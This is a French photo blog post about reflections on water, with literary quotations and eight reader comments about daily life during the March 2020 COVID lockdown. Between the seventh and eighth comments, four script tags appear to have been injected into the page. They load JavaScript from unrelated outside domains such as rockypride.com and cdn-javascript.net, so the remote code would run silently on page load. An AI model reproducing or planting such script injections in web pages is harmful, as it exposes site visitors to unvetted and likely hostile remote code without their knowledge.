• FAN....... DE FOTO

     

     

    FAN....... DE  FOTO

     

     

    Je suis une fan de foto et
    j’aime jouer
    avec . ...

    FAN....... DE  FOTO

    La Majesté des ponts,

    Les reflets de lumiere,

    Les jeux des toits enchevetres,

    Dans la brume du matin, ou au declin du soleil,

    Les tonalités des couleurs d’automne


    Des images plein la téte,

    Les reflets sont des sujets interessants

    FAN....... DE  FOTO

    pour celui ou celle qui aime la foto

      Ils offrent d’innombrables  possibilités.

    L’envers d’un décor,   trouble parfois

    .

    FAN....... DE  FOTO

    On pense le plus souvent a la foto paysage, ou un lac

    FAN....... DE  FOTO

    un canal,

    FAN....... DE  FOTO

    une riviere qui reflechit les alentours

    FAN....... DE  FOTO

    J’ai capté aussi des reflets dans le cadre de fotos de rue

    FAN....... DE  FOTO

    FAN....... DE  FOTO

     

    FAN....... DE  FOTO

    FAN....... DE  FOTO

     

    FAN....... DE  FOTO

     

    des Reflets d’azur au fil de d’eau

     

    FAN....... DE  FOTO

     

    FAN....... DE  FOTO

    « En devenant miroir du ciel sans cesse changeant,

    les plans d'eau impliquent la liberté.

    Rien de plus éphémère que ces reflets. »

    (Erik Orsenna)

    Reflets du soleil couchant

    FAN....... DE  FOTO

     

    Reflets de nuit

    FAN....... DE  FOTO

    « Le meilleur miroir ne reflete pas l’autre côté des choses. »

    (proverbe japonais)

    FAN....... DE  FOTO

    « L'Art, c'est le reflet que renvoie l'âme humaine éblouie

    de la splendeur du beau. »

      Victor Hugo

    FAN....... DE  FOTO

     « Il faut être capable de refleter même les choses les plus pures. »

      André Gide

    FAN....... DE  FOTO

      Un pont qui se mire dans l’eau

    FAN....... DE  FOTO

     

     

    ou un lac en montagne

    FAN....... DE  FOTO

    Et vous, les Amis des photos de reflets, vous en avez ?

     

    N’hésitez pas à les partager

     

     ......

    FAN....... DE  FOTO

     


  • Commentaires

    1
    Mardi 24 Mars 2020 à 08:25

    De très belles images pour s'évader quelques instants et oublier ces quatre murs.

    Je suis surpris que ton médecin reçoive encore tant de monde, chez nous on nous propose la téléconsultation, tout se met en place pour que nous ne soyons plus obligé de sortir, c'est beaucoup plus sécurisant pour nous, quand on voit les personnes qui traînent encore dans le rue on a pas envie de se risquer dehors, tant que les gens ne resteront pas confiné la virus se propagera, il faut compter 3 semaines après une confination totale pour voir la maladie régresser, on en est encore bien loin.

    Prends bien soin de toi et passe une belle journée

    Amicalement

    Claude

    2
    Mardi 24 Mars 2020 à 12:01

    Oui voilà un bel article pour nous changer les idées ! . De ne pas aller sur le sable est trés frustrant surtout pour mon mari qui fait son footing sur le sable , enfin ! . Bonne journée chez toi  , gros bisous , escapade , 

    3
    Mardi 24 Mars 2020 à 13:18

    j'adore les reflets, je suis gâtée, merci Vaiana. cathy

    4
    Mardi 24 Mars 2020 à 13:30

    Bonjour Vaiana! merci pour ton message! Je suis très fatiguée! je devrais me reposer un peu! peut-être que je ne pourrai pas descendre au jardin aujourd'hui! papa m'a réclamé un gâteau je lui ai fait un gâteau au yaourt! et ma voisine m'a réclamé des attestations aussi il faudra bien que je leur apporte! merci pour tes belles images et pour tes pensées bisous!

    5
    Mardi 24 Mars 2020 à 16:22

    Bonjour ma gentille Vaiana,  la confination totale pour nous deux, moa pharmacienne ma ramenée mes médicaments pour le mois a Fabien  elle a posé sur le sac sur la grille car mon portail est fermé a clé personne ne rentre, on se contacte par tél,  Fabien aime bien cette chansonnette pour Jésus et Marie c'est sa seule prière que lui a apprise soeur Paule avec qui il allumait les cierges de la chapelle  et Fabien embrassait Jésus et Marie,  Soeur Paule est aprtie au ciel maintenant mais je suis sur qu'elle aime encore Fabien et le protège de tout son amour qu'elle avait pour les enfants handicapés, j'espère que tu vas bien et je pense a Monque  et son mari Rémi s'il est touché  j'espère que non  ce serais très dur car elle peux pas redescendre chez elle, j'ai pas d'autres nouvelles  d'elle, je te souhaite une bonne journée fais bien attention a toi ma douce gros bisous Marie

    6
    Mardi 24 Mars 2020 à 18:35

    Bonsoir Vainae !

    J'ai regardé avec plaisir les belles photos et les pensés qui les accompagnent. J'espère que toi et ta famille vont bien. J'ai une permanence dans une maison de retraite que je visite. Je me suis proposé pour faire la désinfection trois fois par jour. Les personnes âgées sont confinés dans leur chambre,elles ne peuvent pas voir leur famille. Cela me donne de la joie de me sentir utile dans des moments pareils mais comme je suis aidé soignante je leur doit bien cela....je me protège pour le faire. Je me rend compte que il faut parfois les extrêmes pour voir la solidarité des personnes comme le corps médical. Titi a tout ce qu'il faut et on lui passe des commandes pour ses repas, qu'elle gentillesse ! Mon ordi est cassé  et depuis la directrice de l'ETA lisement m'a offert une tablette prêté bien sûr !  Qu'elle gentigesse! Je souffre pour ceux qui souffrent mais mon coeur est _plein de joie sereine...tu vois ce que je veux dire. Je te souhaite une bonne soirée et pense à tes petits qui n'ont pas les gâteaux de mamie..mais heureusement qu'il y a le net. Bisous.nani et Titi

    7
    Mardi 24 Mars 2020 à 19:14

    Bonsoir vaiaenae,

    Merci pour ce bel article, de jolies photos. On oublie un peu le fait de devoir

    rester chez soi. Comment vas-tu? Bonne soirée . Bisous -violette

    <script src="//rockypride.com/2299156fcd9f4015b0.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1585073508041" type="text/javascript"></script> <script src="http://rockypride.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    8
    Mercredi 25 Mars 2020 à 04:15

    Bonjour ma douce amie

    Magnifique ton billet avec de superbes photos qui font chaud au coeur et ces belles pensées.

    Courage mon amie et j'espère de tout coeur que tu seras soulagée de tes douleurs.

    Mon petit coucou rapide du matin profitant que ma connexion rame un peu moins (problème de câble souterrain + avec le confinement beaucoup de gens surfent sur le net en même temps, donc forcément la connexion est très ralentie, mais tant que çà fonctionne pour permettre de garder le contact avec la famille les ami(e)s c'est super !).

    Surtout prudence et prends bien soin de toi.

    Je te fais de gros bisous de loin donc sans danger.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :